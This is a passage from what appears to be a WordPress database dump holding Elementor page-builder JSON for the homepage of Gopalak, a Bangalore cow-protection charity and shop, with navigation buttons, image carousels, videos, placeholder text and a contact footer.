button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-11\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10197,1706,'_elementor_page_assets','a:0:{}'),(10199,1707,'_elementor_edit_mode','builder'),(10200,1707,'_elementor_template_type','wp-page'),(10201,1707,'_elementor_version','3.7.8'),(10202,1707,'_wp_page_template','elementor_canvas'),(10203,1707,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-11\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 